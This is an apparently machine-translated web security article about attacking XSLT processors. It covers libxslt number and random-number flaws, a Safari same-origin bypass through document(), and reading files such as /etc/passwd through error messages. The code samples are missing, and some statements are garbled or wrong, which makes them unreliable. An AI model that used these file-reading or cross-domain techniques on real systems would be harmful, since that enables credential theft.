How to Use XSLT to continue cracking XML

How to Use XSLT to continue cracking XML

0x00 Introduction

XSL

First, we should say that this XSLT should be broken: XSL-T. XSL refers to the EXtensible Stylesheet Language, which is directly translated into the extended style sheet Language. This language has a great relationship with xml: XSL is equivalent to CSS in HTML. Every element of HTML is predefined, for example, used to define a table, and the browser knows how to identify this tag. In this case, CSS can easily tell the browser how to display this table, however, since any label in XML can be defined by the programmer, an XSL language is required to describe how to display xml documents. This is a web Security Article, so we still discuss web-related xsl security, while xslt v1 can be called on the web. So we only discuss the story of version1.

XSLT

XSL consists of three parts: XSLT, XPath, and XSL-FO. In the security field, Xpath has already been studied by our predecessors (xpath injection), and almost no one cares about the other two. At last year's black hat hackers' conference, a security organization (IOActive) finally shared its research findings, Abusing XSLT. XSLT, as its name implies, is used to convert XML into XHTML or other XML documents.

When other documents are generated using XML (e.g. xhtml), XSL can be referenced as XML. At the same time, XSL can be embedded into XML to play a role.

Considering XSLT security, we have to consider their application scenarios. In this article, we will analyze the vulnerability of XSLT implementation from the client and server. To simplify the discussion, we will discuss the security issues of these vendors:

Libxslt: libxslt provides XSL Parsing for backend Python, PHP, PERL, RUBY, and safari, opera, and chrome.

Transformiix: It is discussed because it is called by firefox to process xsl

Microsoft: You can understand it without explanation. Microsoft's own IE must use its own Parsing Library.

0x01 attack model

Customer/Server: digital representation and operational risks

XSL has its own "unique" Understanding of mathematics. Let's first discuss how it processes big integers:

Large Integers

For example

And Its Style

In the libxslt processing software such as Xsltproc, Php, Perl, Ruby, Python, Safari, Chrome, and Opera, the above xml is interpreted as follows (chrome ):

The problem is obvious.

IOActive provides the results of their research.

Random Number

Similarly, some vendor of xsl are quite freehand in generating random numbers. However, this rough vendor is still the most widely used libxslt. Because this library does not have IV when generating random numbers, the random numbers generated each time remain unchanged.

Let's bring this together with PRG for hi...

Client: Safari SOP Bypass

Safari's same-source policy may also be damaged by the xml style language.

As mentioned above, safari has long supported xml and xhtml conversion. However, using document () in XSLT, we can use the corresponding cookies to read resources in other regions of safari across domains. In this way, we can steal user information from other websites through the document ()-> value-of ()/copy-of () process, and finally, attackers can use JavaScript to send messages.

I reproduced the ioactive poc, but the result is different from that of IOActive:

In the IOActive report

No doubt the result is successfully obtained, and BYPASS is successful.

I got this prompt in the Safari control tower during a local test.

No doubt the sop has been suspended.

If apple fixes the vulnerability or uses the incorrect posture, I put the POC at the end of the article. You can download it and study it.

Server: Arbitrary File Reading

The XSLT document is terminated immediately when an execution error occurs. It is similar to the XML of its brother, and an error will be thrown if a small error occurs. However, the error message can also bring some useful information to attackers.

XSLT provides three methods for reading files.

Document (): used to access the information in another xml document (also used in cross-origin)

Include (): Used to merge two style sheets

Import (): Used to overwrite one style table

For example, the following style Table

 
 
  /etc/passwd
 

And B

 

When B is parsed, it tries to call table A, while Table A tries to read/etc/passwd content using document (). Obviously this is not an xml document, therefore, it is impossible to read. Fortunately, in the output error message, we can see that the first line of the target text is output.

Although there is only the first line, the first line can get a lot of Ming information.

/etc/passwd: Linux root password/etc/shadow: Linux root password.htpasswd: Apache password.pgpass: PostgreSQL password

This time, all methods (document (), import (), and include () in the four languages of javastproc php perl ruby are affected.